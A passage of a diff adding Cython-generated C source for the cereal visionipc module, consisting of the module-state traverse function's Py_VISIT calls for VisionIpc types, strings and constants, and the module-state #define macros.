Py_VISIT(traverse_module_state->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + Py_VISIT(traverse_module_state->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + Py_VISIT(traverse_module_state->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + Py_VISIT(traverse_module_state->__pyx_ptype___Pyx_EnumMeta); + Py_VISIT(traverse_module_state->__Pyx_EnumMeta); + Py_VISIT(traverse_module_state->__pyx_array_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_array); + Py_VISIT(traverse_module_state->__pyx_MemviewEnum_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_MemviewEnum); + Py_VISIT(traverse_module_state->__pyx_memoryview_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryview); + Py_VISIT(traverse_module_state->__pyx_memoryviewslice_type); + Py_VISIT(traverse_module_state->__pyx_type___pyx_memoryviewslice); + Py_VISIT(traverse_module_state->__pyx_kp_b_); + Py_VISIT(traverse_module_state->__pyx_kp_s_); + Py_VISIT(traverse_module_state->__pyx_n_s_ASCII); + Py_VISIT(traverse_module_state->__pyx_kp_s_All_dimensions_preceding_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_AssertionError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Buffer_view_does_not_expose_stri); + Py_VISIT(traverse_module_state->__pyx_kp_s_Can_only_create_a_buffer_that_is); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_assign_to_read_only_memor); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_create_writable_memory_vi); + Py_VISIT(traverse_module_state->__pyx_kp_u_Cannot_index_with_type); + Py_VISIT(traverse_module_state->__pyx_kp_s_Cannot_transpose_memoryview_with); + Py_VISIT(traverse_module_state->__pyx_kp_s_Dimension_d_is_not_direct); + Py_VISIT(traverse_module_state->__pyx_n_s_Ellipsis); + Py_VISIT(traverse_module_state->__pyx_kp_s_Empty_shape_tuple_for_cython_arr); + Py_VISIT(traverse_module_state->__pyx_n_s_EnumBase); + Py_VISIT(traverse_module_state->__pyx_n_s_EnumType); + Py_VISIT(traverse_module_state->__pyx_n_s_ImportError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_VISIT(traverse_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0_2); + Py_VISIT(traverse_module_state->__pyx_n_s_IndexError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Index_out_of_bounds_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_s_Indirect_dimensions_not_supporte); + Py_VISIT(traverse_module_state->__pyx_n_s_IntEnum); + Py_VISIT(traverse_module_state->__pyx_n_s_IntFlag); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_mode_expected_c_or_fortr); + Py_VISIT(traverse_module_state->__pyx_kp_u_Invalid_shape_in_axis); + Py_VISIT(traverse_module_state->__pyx_n_s_MemoryError); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_at_0x_x); + Py_VISIT(traverse_module_state->__pyx_kp_s_MemoryView_of_r_object); + Py_VISIT(traverse_module_state->__pyx_n_b_O); + Py_VISIT(traverse_module_state->__pyx_n_s_OrderedDict); + Py_VISIT(traverse_module_state->__pyx_kp_u_Out_of_bounds_on_buffer_access_a); + Py_VISIT(traverse_module_state->__pyx_n_s_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase___new); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase___repr); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumBase___str); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumMeta___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_EnumMeta___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase___new); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase___repr); + Py_VISIT(traverse_module_state->__pyx_n_s_Pyx_FlagBase___str); + Py_VISIT(traverse_module_state->__pyx_n_s_Sequence); + Py_VISIT(traverse_module_state->__pyx_kp_s_Step_may_not_be_zero_axis_d); + Py_VISIT(traverse_module_state->__pyx_kp_b_T); + Py_VISIT(traverse_module_state->__pyx_n_s_TypeError); + Py_VISIT(traverse_module_state->__pyx_kp_s_Unable_to_convert_item_to_object); + Py_VISIT(traverse_module_state->__pyx_kp_s_Unknown_enum_value_s); + Py_VISIT(traverse_module_state->__pyx_n_s_VISION_STREAM_DRIVER); + Py_VISIT(traverse_module_state->__pyx_n_s_VISION_STREAM_MAP); + Py_VISIT(traverse_module_state->__pyx_n_s_VISION_STREAM_ROAD); + Py_VISIT(traverse_module_state->__pyx_n_s_VISION_STREAM_WIDE_ROAD); + Py_VISIT(traverse_module_state->__pyx_n_s_ValueError); + Py_VISIT(traverse_module_state->__pyx_n_s_View_MemoryView); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionBuf); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionBuf___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionBuf___setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcClient); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcClient___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcClient___setstate_cytho); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcClient_available_stream); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcClient_connect); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcClient_is_connected); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcClient_recv); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcServer); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcServer___reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcServer___setstate_cytho); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcServer_create_buffers); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcServer_create_buffers_w); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcServer_send); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionIpcServer_start_listener); + Py_VISIT(traverse_module_state->__pyx_n_s_VisionStreamType); + Py_VISIT(traverse_module_state->__pyx_kp_b__11); + Py_VISIT(traverse_module_state->__pyx_kp_b__12); + Py_VISIT(traverse_module_state->__pyx_kp_b__13); + Py_VISIT(traverse_module_state->__pyx_kp_u__14); + Py_VISIT(traverse_module_state->__pyx_kp_u__15); + Py_VISIT(traverse_module_state->__pyx_kp_u__3); + Py_VISIT(traverse_module_state->__pyx_kp_u__4); + Py_VISIT(traverse_module_state->__pyx_n_s__5); + Py_VISIT(traverse_module_state->__pyx_n_s__68); + Py_VISIT(traverse_module_state->__pyx_kp_u__8); + Py_VISIT(traverse_module_state->__pyx_kp_u__9); + Py_VISIT(traverse_module_state->__pyx_n_s_abc); + Py_VISIT(traverse_module_state->__pyx_n_s_allocate_buffer); + Py_VISIT(traverse_module_state->__pyx_kp_u_and); + Py_VISIT(traverse_module_state->__pyx_n_s_asarray); + Py_VISIT(traverse_module_state->__pyx_n_s_asyncio_coroutines); + Py_VISIT(traverse_module_state->__pyx_n_s_available_streams); + Py_VISIT(traverse_module_state->__pyx_n_s_base); + Py_VISIT(traverse_module_state->__pyx_n_s_block); + Py_VISIT(traverse_module_state->__pyx_n_s_blocking); + Py_VISIT(traverse_module_state->__pyx_n_s_buf); + Py_VISIT(traverse_module_state->__pyx_n_s_c); + Py_VISIT(traverse_module_state->__pyx_n_u_c); + Py_VISIT(traverse_module_state->__pyx_kp_s_cereal_visionipc_visionipc_pyx); + Py_VISIT(traverse_module_state->__pyx_kp_s_cereal_visionipc_visionipc_pyx_p); + Py_VISIT(traverse_module_state->__pyx_n_s_class); + Py_VISIT(traverse_module_state->__pyx_n_s_class_getitem); + Py_VISIT(traverse_module_state->__pyx_n_s_cline_in_traceback); + Py_VISIT(traverse_module_state->__pyx_n_s_cls); + Py_VISIT(traverse_module_state->__pyx_n_s_collections); + Py_VISIT(traverse_module_state->__pyx_kp_s_collections_abc); + Py_VISIT(traverse_module_state->__pyx_n_s_conflate); + Py_VISIT(traverse_module_state->__pyx_n_s_connect); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_contiguous_and_indirect); + Py_VISIT(traverse_module_state->__pyx_n_s_count); + Py_VISIT(traverse_module_state->__pyx_n_s_create_buffers); + Py_VISIT(traverse_module_state->__pyx_n_s_create_buffers_with_sizes); + Py_VISIT(traverse_module_state->__pyx_n_s_data); + Py_VISIT(traverse_module_state->__pyx_n_s_dct); + Py_VISIT(traverse_module_state->__pyx_n_s_dict); + Py_VISIT(traverse_module_state->__pyx_n_s_dict_2); + Py_VISIT(traverse_module_state->__pyx_kp_u_disable); + Py_VISIT(traverse_module_state->__pyx_n_s_doc); + Py_VISIT(traverse_module_state->__pyx_n_s_dtype_is_object); + Py_VISIT(traverse_module_state->__pyx_kp_u_enable); + Py_VISIT(traverse_module_state->__pyx_n_s_encode); + Py_VISIT(traverse_module_state->__pyx_n_s_enum); + Py_VISIT(traverse_module_state->__pyx_n_s_enumerate); + Py_VISIT(traverse_module_state->__pyx_n_s_error); + Py_VISIT(traverse_module_state->__pyx_n_s_extra); + Py_VISIT(traverse_module_state->__pyx_n_s_flags); + Py_VISIT(traverse_module_state->__pyx_n_s_format); + Py_VISIT(traverse_module_state->__pyx_n_s_fortran); + Py_VISIT(traverse_module_state->__pyx_n_u_fortran); + Py_VISIT(traverse_module_state->__pyx_n_s_frame_id); + Py_VISIT(traverse_module_state->__pyx_kp_u_gc); + Py_VISIT(traverse_module_state->__pyx_n_s_get); + Py_VISIT(traverse_module_state->__pyx_n_s_get_endpoint_name); + Py_VISIT(traverse_module_state->__pyx_n_s_getstate); + Py_VISIT(traverse_module_state->__pyx_kp_u_got); + Py_VISIT(traverse_module_state->__pyx_kp_u_got_differing_extents_in_dimensi); + Py_VISIT(traverse_module_state->__pyx_n_s_height); + Py_VISIT(traverse_module_state->__pyx_n_s_id); + Py_VISIT(traverse_module_state->__pyx_n_s_import); + Py_VISIT(traverse_module_state->__pyx_n_s_index); + Py_VISIT(traverse_module_state->__pyx_n_s_init); + Py_VISIT(traverse_module_state->__pyx_n_s_init_subclass); + Py_VISIT(traverse_module_state->__pyx_n_s_initializing); + Py_VISIT(traverse_module_state->__pyx_n_s_is_connected); + Py_VISIT(traverse_module_state->__pyx_n_s_is_coroutine); + Py_VISIT(traverse_module_state->__pyx_kp_u_isenabled); + Py_VISIT(traverse_module_state->__pyx_n_s_itemsize); + Py_VISIT(traverse_module_state->__pyx_kp_s_itemsize_0_for_cython_array); + Py_VISIT(traverse_module_state->__pyx_n_s_join); + Py_VISIT(traverse_module_state->__pyx_n_s_main); + Py_VISIT(traverse_module_state->__pyx_n_s_member_names); + Py_VISIT(traverse_module_state->__pyx_n_s_members); + Py_VISIT(traverse_module_state->__pyx_n_s_memview); + Py_VISIT(traverse_module_state->__pyx_n_s_metaclass); + Py_VISIT(traverse_module_state->__pyx_n_s_mode); + Py_VISIT(traverse_module_state->__pyx_n_s_module); + Py_VISIT(traverse_module_state->__pyx_n_s_module_2); + Py_VISIT(traverse_module_state->__pyx_n_s_mro_entries); + Py_VISIT(traverse_module_state->__pyx_n_s_name); + Py_VISIT(traverse_module_state->__pyx_n_s_name_2); + Py_VISIT(traverse_module_state->__pyx_n_s_ndim); + Py_VISIT(traverse_module_state->__pyx_n_s_new); + Py_VISIT(traverse_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_VISIT(traverse_module_state->__pyx_n_s_np); + Py_VISIT(traverse_module_state->__pyx_n_s_num_buffers); + Py_VISIT(traverse_module_state->__pyx_n_s_numpy); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_multiarray_failed_to); + Py_VISIT(traverse_module_state->__pyx_kp_u_numpy_core_umath_failed_to_impor); + Py_VISIT(traverse_module_state->__pyx_n_s_obj); + Py_VISIT(traverse_module_state->__pyx_n_s_pack); + Py_VISIT(traverse_module_state->__pyx_n_s_parents); + Py_VISIT(traverse_module_state->__pyx_n_s_pickle); + Py_VISIT(traverse_module_state->__pyx_n_s_prepare); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_PickleError); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_checksum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_result); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_state); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_type); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_unpickle_Enum); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_unpickle___Pyx_EnumMeta); + Py_VISIT(traverse_module_state->__pyx_n_s_pyx_vtable); + Py_VISIT(traverse_module_state->__pyx_n_s_qualname); + Py_VISIT(traverse_module_state->__pyx_n_s_range); + Py_VISIT(traverse_module_state->__pyx_n_s_recv); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_reduce_ex); + Py_VISIT(traverse_module_state->__pyx_n_s_register); + Py_VISIT(traverse_module_state->__pyx_n_s_repr); + Py_VISIT(traverse_module_state->__pyx_n_s_res); + Py_VISIT(traverse_module_state->__pyx_n_s_rgb); + Py_VISIT(traverse_module_state->__pyx_kp_s_s_s); + Py_VISIT(traverse_module_state->__pyx_kp_s_s_s_d); + Py_VISIT(traverse_module_state->__pyx_n_s_self); + Py_VISIT(traverse_module_state->__pyx_kp_s_self_buf_cannot_be_converted_to); + Py_VISIT(traverse_module_state->__pyx_kp_s_self_server_cannot_be_converted); + Py_VISIT(traverse_module_state->__pyx_n_s_send); + Py_VISIT(traverse_module_state->__pyx_n_s_set_name); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_setstate_cython); + Py_VISIT(traverse_module_state->__pyx_n_s_shape); + Py_VISIT(traverse_module_state->__pyx_n_s_size); + Py_VISIT(traverse_module_state->__pyx_n_s_spec); + Py_VISIT(traverse_module_state->__pyx_n_s_start); + Py_VISIT(traverse_module_state->__pyx_n_s_start_listener); + Py_VISIT(traverse_module_state->__pyx_n_s_state); + Py_VISIT(traverse_module_state->__pyx_n_s_staticmethod); + Py_VISIT(traverse_module_state->__pyx_n_s_step); + Py_VISIT(traverse_module_state->__pyx_n_s_stop); + Py_VISIT(traverse_module_state->__pyx_n_s_str); + Py_VISIT(traverse_module_state->__pyx_n_s_stream); + Py_VISIT(traverse_module_state->__pyx_n_s_stride); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_indirect); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_struct); + Py_VISIT(traverse_module_state->__pyx_n_s_super); + Py_VISIT(traverse_module_state->__pyx_n_s_sys); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_timeout_ms); + Py_VISIT(traverse_module_state->__pyx_n_s_timestamp_eof); + Py_VISIT(traverse_module_state->__pyx_n_s_timestamp_sof); + Py_VISIT(traverse_module_state->__pyx_n_s_tp); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_VISIT(traverse_module_state->__pyx_n_s_unpack); + Py_VISIT(traverse_module_state->__pyx_n_s_update); + Py_VISIT(traverse_module_state->__pyx_n_s_use_setstate); + Py_VISIT(traverse_module_state->__pyx_n_s_uv_offset); + Py_VISIT(traverse_module_state->__pyx_n_s_v); + Py_VISIT(traverse_module_state->__pyx_n_s_value); + Py_VISIT(traverse_module_state->__pyx_n_s_values); + Py_VISIT(traverse_module_state->__pyx_n_s_version_info); + Py_VISIT(traverse_module_state->__pyx_n_s_width); + Py_VISIT(traverse_module_state->__pyx_int_0); + Py_VISIT(traverse_module_state->__pyx_int_1); + Py_VISIT(traverse_module_state->__pyx_int_3); + Py_VISIT(traverse_module_state->__pyx_int_100); + Py_VISIT(traverse_module_state->__pyx_int_112105877); + Py_VISIT(traverse_module_state->__pyx_int_136983863); + Py_VISIT(traverse_module_state->__pyx_int_184977713); + Py_VISIT(traverse_module_state->__pyx_int_222419149); + Py_VISIT(traverse_module_state->__pyx_int_228825662); + Py_VISIT(traverse_module_state->__pyx_int_238750788); + Py_VISIT(traverse_module_state->__pyx_int_neg_1); + Py_VISIT(traverse_module_state->__pyx_slice__7); + Py_VISIT(traverse_module_state->__pyx_tuple__2); + Py_VISIT(traverse_module_state->__pyx_tuple__6); + Py_VISIT(traverse_module_state->__pyx_tuple__10); + Py_VISIT(traverse_module_state->__pyx_tuple__16); + Py_VISIT(traverse_module_state->__pyx_tuple__17); + Py_VISIT(traverse_module_state->__pyx_tuple__18); + Py_VISIT(traverse_module_state->__pyx_tuple__20); + Py_VISIT(traverse_module_state->__pyx_tuple__22); + Py_VISIT(traverse_module_state->__pyx_tuple__24); + Py_VISIT(traverse_module_state->__pyx_tuple__25); + Py_VISIT(traverse_module_state->__pyx_tuple__29); + Py_VISIT(traverse_module_state->__pyx_tuple__32); + Py_VISIT(traverse_module_state->__pyx_tuple__34); + Py_VISIT(traverse_module_state->__pyx_tuple__35); + Py_VISIT(traverse_module_state->__pyx_tuple__36); + Py_VISIT(traverse_module_state->__pyx_tuple__37); + Py_VISIT(traverse_module_state->__pyx_tuple__38); + Py_VISIT(traverse_module_state->__pyx_tuple__39); + Py_VISIT(traverse_module_state->__pyx_tuple__40); + Py_VISIT(traverse_module_state->__pyx_tuple__41); + Py_VISIT(traverse_module_state->__pyx_tuple__42); + Py_VISIT(traverse_module_state->__pyx_tuple__44); + Py_VISIT(traverse_module_state->__pyx_tuple__48); + Py_VISIT(traverse_module_state->__pyx_tuple__50); + Py_VISIT(traverse_module_state->__pyx_tuple__52); + Py_VISIT(traverse_module_state->__pyx_tuple__54); + Py_VISIT(traverse_module_state->__pyx_tuple__58); + Py_VISIT(traverse_module_state->__pyx_tuple__60); + Py_VISIT(traverse_module_state->__pyx_tuple__61); + Py_VISIT(traverse_module_state->__pyx_tuple__64); + Py_VISIT(traverse_module_state->__pyx_codeobj__19); + Py_VISIT(traverse_module_state->__pyx_codeobj__21); + Py_VISIT(traverse_module_state->__pyx_codeobj__23); + Py_VISIT(traverse_module_state->__pyx_codeobj__26); + Py_VISIT(traverse_module_state->__pyx_codeobj__27); + Py_VISIT(traverse_module_state->__pyx_codeobj__28); + Py_VISIT(traverse_module_state->__pyx_codeobj__30); + Py_VISIT(traverse_module_state->__pyx_codeobj__31); + Py_VISIT(traverse_module_state->__pyx_codeobj__33); + Py_VISIT(traverse_module_state->__pyx_codeobj__43); + Py_VISIT(traverse_module_state->__pyx_codeobj__45); + Py_VISIT(traverse_module_state->__pyx_codeobj__46); + Py_VISIT(traverse_module_state->__pyx_codeobj__47); + Py_VISIT(traverse_module_state->__pyx_codeobj__49); + Py_VISIT(traverse_module_state->__pyx_codeobj__51); + Py_VISIT(traverse_module_state->__pyx_codeobj__53); + Py_VISIT(traverse_module_state->__pyx_codeobj__55); + Py_VISIT(traverse_module_state->__pyx_codeobj__56); + Py_VISIT(traverse_module_state->__pyx_codeobj__57); + Py_VISIT(traverse_module_state->__pyx_codeobj__59); + Py_VISIT(traverse_module_state->__pyx_codeobj__62); + Py_VISIT(traverse_module_state->__pyx_codeobj__63); + Py_VISIT(traverse_module_state->__pyx_codeobj__65); + Py_VISIT(traverse_module_state->__pyx_codeobj__66); + Py_VISIT(traverse_module_state->__pyx_codeobj__67); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_7cpython_4type_type __pyx_mstate_global->__pyx_ptype_7cpython_4type_type +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_5numpy_dtype __pyx_mstate_global->__pyx_ptype_5numpy_dtype +#define __pyx_ptype_5numpy_flatiter __pyx_mstate_global->__pyx_ptype_5numpy_flatiter +#define __pyx_ptype_5numpy_broadcast __pyx_mstate_global->__pyx_ptype_5numpy_broadcast +#define __pyx_ptype_5numpy_ndarray __pyx_mstate_global->__pyx_ptype_5numpy_ndarray +#define __pyx_ptype_5numpy_generic __pyx_mstate_global->__pyx_ptype_5numpy_generic +#define __pyx_ptype_5numpy_number __pyx_mstate_global->__pyx_ptype_5numpy_number +#define __pyx_ptype_5numpy_integer __pyx_mstate_global->__pyx_ptype_5numpy_integer +#define __pyx_ptype_5numpy_signedinteger __pyx_mstate_global->__pyx_ptype_5numpy_signedinteger +#define __pyx_ptype_5numpy_unsignedinteger __pyx_mstate_global->__pyx_ptype_5numpy_unsignedinteger +#define __pyx_ptype_5numpy_inexact __pyx_mstate_global->__pyx_ptype_5numpy_inexact +#define __pyx_ptype_5numpy_floating __pyx_mstate_global->__pyx_ptype_5numpy_floating +#define __pyx_ptype_5numpy_complexfloating __pyx_mstate_global->__pyx_ptype_5numpy_complexfloating +#define __pyx_ptype_5numpy_flexible __pyx_mstate_global->__pyx_ptype_5numpy_flexible +#define __pyx_ptype_5numpy_character __pyx_mstate_global->__pyx_ptype_5numpy_character +#define __pyx_ptype_5numpy_ufunc __pyx_mstate_global->__pyx_ptype_5numpy_ufunc +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf __pyx_mstate_global->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionBuf +#define __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer __pyx_mstate_global->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer +#define __pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient __pyx_mstate_global->__pyx_type_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient +#define __Pyx_EnumMeta __pyx_mstate_global->__Pyx_EnumMeta +#define __pyx_type___pyx_array __pyx_mstate_global->__pyx_type___pyx_array +#define __pyx_type___pyx_MemviewEnum __pyx_mstate_global->__pyx_type___pyx_MemviewEnum +#define __pyx_type___pyx_memoryview __pyx_mstate_global->__pyx_type___pyx_memoryview +#define __pyx_type___pyx_memoryviewslice __pyx_mstate_global->__pyx_type___pyx_memoryviewslice +#endif +#define __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf __pyx_mstate_global->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionBuf +#define __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer __pyx_mstate_global->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer +#define __pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient __pyx_mstate_global->__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient +#define __pyx_ptype___Pyx_EnumMeta __pyx_mstate_global->__pyx_ptype___Pyx_EnumMeta +#define __pyx_array_type __pyx_mstate_global->__pyx_array_type +#define __pyx_MemviewEnum_type __pyx_mstate_global->__pyx_MemviewEnum_type +#define __pyx_memoryview_type __pyx_mstate_global->__pyx_memoryview_type +#define __pyx_memoryviewslice_type __pyx_mstate_global->__pyx_memoryviewslice_type +#define __pyx_kp_b_ __pyx_mstate_global->__pyx_kp_b_ +#define __pyx_kp_s_ __pyx_mstate_global->__pyx_kp_s_ +#define __pyx_n_s_ASCII __pyx_mstate_global->__pyx_n_s_ASCII +#define __pyx_kp_s_All_dimensions_preceding_dimensi __pyx_mstate_global->__pyx_kp_s_All_dimensions_preceding_dimensi +#define __pyx_n_s_AssertionError __pyx_mstate_global->__pyx_n_s_AssertionError +#define __pyx_kp_s_Buffer_view_does_not_expose_stri __pyx_mstate_global->__pyx_kp_s_Buffer_view_does_not_expose_stri +#define __pyx_kp_s_Can_only_create_a_buffer_that_is __pyx_mstate_global->__pyx_kp_s_Can_only_create_a_buffer_that_is +#define __pyx_kp_s_Cannot_assign_to_read_only_memor __pyx_mstate_global->__pyx_kp_s_Cannot_assign_to_read_only_memor +#define __pyx_kp_s_Cannot_create_writable_memory_vi __pyx_mstate_global->__pyx_kp_s_Cannot_create_writable_memory_vi +#define __pyx_kp_u_Cannot_index_with_type __pyx_mstate_global->__pyx_kp_u_Cannot_index_with_type +#define __pyx_kp_s_Cannot_transpose_memoryview_with __pyx_mstate_global->__pyx_kp_s_Cannot_transpose_memoryview_with +#define __pyx_kp_s_Dimension_d_is_not_direct __pyx_mstate_global->__pyx_kp_s_Dimension_d_is_not_direct +#define __pyx_n_s_Ellipsis __pyx_mstate_global->__pyx_n_s_Ellipsis +#define __pyx_kp_s_Empty_shape_tuple_for_cython_arr __pyx_mstate_global->__pyx_kp_s_Empty_shape_tuple_for_cython_arr +#define __pyx_n_s_EnumBase __pyx_mstate_global->__pyx_n_s_EnumBase +#define __pyx_n_s_EnumType __pyx_mstate_global->__pyx_n_s_EnumType +#define __pyx_n_s_ImportError __pyx_mstate_global->__pyx_n_s_ImportError +#define __pyx_kp_s_Incompatible_checksums_0x_x_vs_0 __pyx_mstate_global->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0 +#define __pyx_kp_s_Incompatible_checksums_0x_x_vs_0_2 __pyx_mstate_global->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0_2 +#define __pyx_n_s_IndexError __pyx_mstate_global->__pyx_n_s_IndexError +#define __pyx_kp_s_Index_out_of_bounds_axis_d __pyx_mstate_global->__pyx_kp_s_Index_out_of_bounds_axis_d +#define __pyx_kp_s_Indirect_dimensions_not_supporte __pyx_mstate_global->__pyx_kp_s_Indirect_dimensions_not_supporte +#define __pyx_n_s_IntEnum __pyx_mstate_global->__pyx_n_s_IntEnum +#define __pyx_n_s_IntFlag __pyx_mstate_global->__pyx_n_s_IntFlag +#define __pyx_kp_u_Invalid_mode_expected_c_or_fortr __pyx_mstate_global->__pyx_kp_u_Invalid_mode_expected_c_or_fortr +#define __pyx_kp_u_Invalid_shape_in_axis __pyx_mstate_global->__pyx_kp_u_Invalid_shape_in_axis +#define __pyx_n_s_MemoryError __pyx_mstate_global->__pyx_n_s_MemoryError +#define __pyx_kp_s_MemoryView_of_r_at_0x_x __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_at_0x_x +#define __pyx_kp_s_MemoryView_of_r_object __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_object +#define __pyx_n_b_O __pyx_mstate_global->__pyx_n_b_O +#define __pyx_n_s_OrderedDict __pyx_mstate_global->__pyx_n_s_OrderedDict +#define __pyx_kp_u_Out_of_bounds_on_buffer_access_a __pyx_mstate_global->__pyx_kp_u_Out_of_bounds_on_buffer_access_a +#define __pyx_n_s_PickleError __pyx_mstate_global->__pyx_n_s_PickleError +#define __pyx_n_s_Pyx_EnumBase __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase +#define __pyx_n_s_Pyx_EnumBase___new __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase___new +#define __pyx_n_s_Pyx_EnumBase___repr __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase___repr +#define __pyx_n_s_Pyx_EnumBase___str __pyx_mstate_global->__pyx_n_s_Pyx_EnumBase___str +#define __pyx_n_s_Pyx_EnumMeta___reduce_cython 